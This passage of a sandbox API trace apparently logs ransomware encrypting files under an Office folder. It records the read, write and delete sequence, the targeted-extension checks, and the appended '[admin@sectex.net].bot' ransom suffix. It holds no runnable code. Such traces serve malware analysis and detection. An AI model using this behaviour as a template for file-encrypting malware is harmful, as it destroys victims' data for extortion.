	[0154.219] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.219] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0154.219] SetEndOfFile (hFile=0x3d0) returned 1
	[0154.219] CloseHandle (hObject=0x3d0) returned 1
	[0154.219] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.219] SetEndOfFile (hFile=0x268) returned 1
	[0154.221] CloseHandle (hObject=0x268) returned 1
	[0154.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk")) returned 1
	[0154.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.240] lstrlenW (lpString=".doc") returned 4
	[0154.240] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0154.240] lstrlenW (lpString=".docx") returned 5
	[0154.240] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0154.240] lstrlenW (lpString=".pdf") returned 4
	[0154.240] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0154.240] lstrlenW (lpString=".xls") returned 4
	[0154.240] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0154.240] lstrlenW (lpString=".xlsx") returned 5
	[0154.240] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0154.240] lstrlenW (lpString=".ppt") returned 4
	[0154.240] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0154.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.240] lstrlenW (lpString=".zip") returned 4
	[0154.240] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0154.240] lstrlenW (lpString=".rar") returned 4
	[0154.240] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0154.240] lstrlenW (lpString=".bz2") returned 4
	[0154.240] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0154.240] lstrlenW (lpString=".7z") returned 3
	[0154.240] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0154.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.240] lstrlenW (lpString=".dbf") returned 4
	[0154.240] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0154.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.241] lstrlenW (lpString=".1cd") returned 4
	[0154.241] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0154.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.241] lstrlenW (lpString=".jpg") returned 4
	[0154.241] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0154.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.241] lstrlenW (lpString=".doc") returned 4
	[0154.241] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0154.241] lstrlenW (lpString=".docx") returned 5
	[0154.241] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0154.241] lstrlenW (lpString=".pdf") returned 4
	[0154.241] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0154.241] lstrlenW (lpString=".xls") returned 4
	[0154.241] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0154.241] lstrlenW (lpString=".xlsx") returned 5
	[0154.241] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0154.241] lstrlenW (lpString=".ppt") returned 4
	[0154.241] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0154.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.241] lstrlenW (lpString=".zip") returned 4
	[0154.241] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0154.241] lstrlenW (lpString=".rar") returned 4
	[0154.241] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0154.241] lstrlenW (lpString=".bz2") returned 4
	[0154.241] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0154.241] lstrlenW (lpString=".7z") returned 3
	[0154.241] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0154.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.241] lstrlenW (lpString=".dbf") returned 4
	[0154.241] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0154.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.242] lstrlenW (lpString=".1cd") returned 4
	[0154.242] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0154.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK") returned 65
	[0154.242] lstrlenW (lpString=".jpg") returned 4
	[0154.242] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0154.242] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0154.242] lstrlenW (lpString="XFUNC.VSL") returned 9
	[0154.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.243] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=52624) returned 1
	[0154.243] CloseHandle (hObject=0x3e0) returned 1
	[0154.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl")) returned 0x20
	[0154.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.244] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.244] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0154.244] GetLastError () returned 0x0
	[0154.245] ReadFile (in: hFile=0x3e0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xcd90, lpOverlapped=0x0) returned 1
	[0154.247] WriteFile (in: hFile=0x3e8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xcda0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xcda0, lpOverlapped=0x0) returned 1
	[0154.249] ReadFile (in: hFile=0x3e0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.249] WriteFile (in: hFile=0x3e8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0154.249] SetEndOfFile (hFile=0x3e8) returned 1
	[0154.249] CloseHandle (hObject=0x3e8) returned 1
	[0154.249] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.249] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.252] CloseHandle (hObject=0x3e0) returned 1
	[0154.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.252] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl")) returned 1
	[0154.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.253] lstrlenW (lpString=".doc") returned 4
	[0154.253] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0154.253] lstrlenW (lpString=".docx") returned 5
	[0154.253] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1
	[0154.253] lstrlenW (lpString=".pdf") returned 4
	[0154.253] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0154.253] lstrlenW (lpString=".xls") returned 4
	[0154.253] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0154.253] lstrlenW (lpString=".xlsx") returned 5
	[0154.254] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1
	[0154.254] lstrlenW (lpString=".ppt") returned 4
	[0154.254] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.254] lstrlenW (lpString=".zip") returned 4
	[0154.254] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0154.254] lstrlenW (lpString=".rar") returned 4
	[0154.254] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString=".bz2") returned 4
	[0154.254] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString=".7z") returned 3
	[0154.254] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0154.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.254] lstrlenW (lpString=".dbf") returned 4
	[0154.254] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.254] lstrlenW (lpString=".1cd") returned 4
	[0154.254] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.254] lstrlenW (lpString=".jpg") returned 4
	[0154.254] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.254] lstrlenW (lpString=".doc") returned 4
	[0154.254] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString=".docx") returned 5
	[0154.254] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1
	[0154.254] lstrlenW (lpString=".pdf") returned 4
	[0154.254] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0154.254] lstrlenW (lpString=".xls") returned 4
	[0154.254] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0154.255] lstrlenW (lpString=".xlsx") returned 5
	[0154.255] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1
	[0154.255] lstrlenW (lpString=".ppt") returned 4
	[0154.255] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0154.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.255] lstrlenW (lpString=".zip") returned 4
	[0154.255] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0154.255] lstrlenW (lpString=".rar") returned 4
	[0154.255] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0154.255] lstrlenW (lpString=".bz2") returned 4
	[0154.255] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0154.255] lstrlenW (lpString=".7z") returned 3
	[0154.255] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0154.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.255] lstrlenW (lpString=".dbf") returned 4
	[0154.255] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0154.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.255] lstrlenW (lpString=".1cd") returned 4
	[0154.255] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0154.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL") returned 57
	[0154.255] lstrlenW (lpString=".jpg") returned 4
	[0154.255] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0154.255] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0154.255] lstrlenW (lpString="XLINTL32.DLL") returned 12
	[0154.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.258] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2362752) returned 1
	[0154.258] CloseHandle (hObject=0x3e0) returned 1
	[0154.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll")) returned 0x20
	[0154.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0154.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.259] lstrlenW (lpString=".doc") returned 4
	[0154.259] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.259] lstrlenW (lpString=".docx") returned 5
	[0154.259] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0154.259] lstrlenW (lpString=".pdf") returned 4
	[0154.259] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.259] lstrlenW (lpString=".xls") returned 4
	[0154.259] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.259] lstrlenW (lpString=".xlsx") returned 5
	[0154.259] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0154.259] lstrlenW (lpString=".ppt") returned 4
	[0154.259] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.259] lstrlenW (lpString=".zip") returned 4
	[0154.259] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.259] lstrlenW (lpString=".rar") returned 4
	[0154.259] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.259] lstrlenW (lpString=".bz2") returned 4
	[0154.259] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.259] lstrlenW (lpString=".7z") returned 3
	[0154.259] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.259] lstrlenW (lpString=".dbf") returned 4
	[0154.259] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.259] lstrlenW (lpString=".1cd") returned 4
	[0154.259] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.259] lstrlenW (lpString=".jpg") returned 4
	[0154.259] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.260] lstrlenW (lpString=".doc") returned 4
	[0154.260] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString=".docx") returned 5
	[0154.260] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0154.260] lstrlenW (lpString=".pdf") returned 4
	[0154.260] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString=".xls") returned 4
	[0154.260] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString=".xlsx") returned 5
	[0154.260] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0154.260] lstrlenW (lpString=".ppt") returned 4
	[0154.260] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.260] lstrlenW (lpString=".zip") returned 4
	[0154.260] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString=".rar") returned 4
	[0154.260] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.260] lstrlenW (lpString=".bz2") returned 4
	[0154.260] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.260] lstrlenW (lpString=".7z") returned 3
	[0154.261] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.261] lstrlenW (lpString=".dbf") returned 4
	[0154.261] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.261] lstrlenW (lpString=".1cd") returned 4
	[0154.261] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL") returned 60
	[0154.261] lstrlenW (lpString=".jpg") returned 4
	[0154.261] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.261] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0154.261] lstrlenW (lpString="XLINTL32.DLL.IDX_DLL") returned 20
	[0154.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.262] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=99200) returned 1
	[0154.262] CloseHandle (hObject=0x3e0) returned 1
	[0154.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.idx_dll")) returned 0x20
	[0154.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.262] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.262] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0154.263] GetLastError () returned 0x0
	[0154.263] ReadFile (in: hFile=0x3e0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x18380, lpOverlapped=0x0) returned 1
	[0154.266] WriteFile (in: hFile=0x3e8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x18390, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x18390, lpOverlapped=0x0) returned 1
	[0154.268] ReadFile (in: hFile=0x3e0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.268] WriteFile (in: hFile=0x3e8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0154.268] SetEndOfFile (hFile=0x3e8) returned 1
	[0154.268] CloseHandle (hObject=0x3e8) returned 1
	[0154.269] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.269] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.272] CloseHandle (hObject=0x3e0) returned 1
	[0154.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.dll.idx_dll")) returned 1
	[0154.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.273] lstrlenW (lpString=".doc") returned 4
	[0154.273] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.273] lstrlenW (lpString=".docx") returned 5
	[0154.273] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.273] lstrlenW (lpString=".pdf") returned 4
	[0154.273] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.273] lstrlenW (lpString=".xls") returned 4
	[0154.273] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.273] lstrlenW (lpString=".xlsx") returned 5
	[0154.273] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.273] lstrlenW (lpString=".ppt") returned 4
	[0154.273] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.273] lstrlenW (lpString=".zip") returned 4
	[0154.273] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.273] lstrlenW (lpString=".rar") returned 4
	[0154.273] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString=".bz2") returned 4
	[0154.274] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString=".7z") returned 3
	[0154.274] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.274] lstrlenW (lpString=".dbf") returned 4
	[0154.274] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
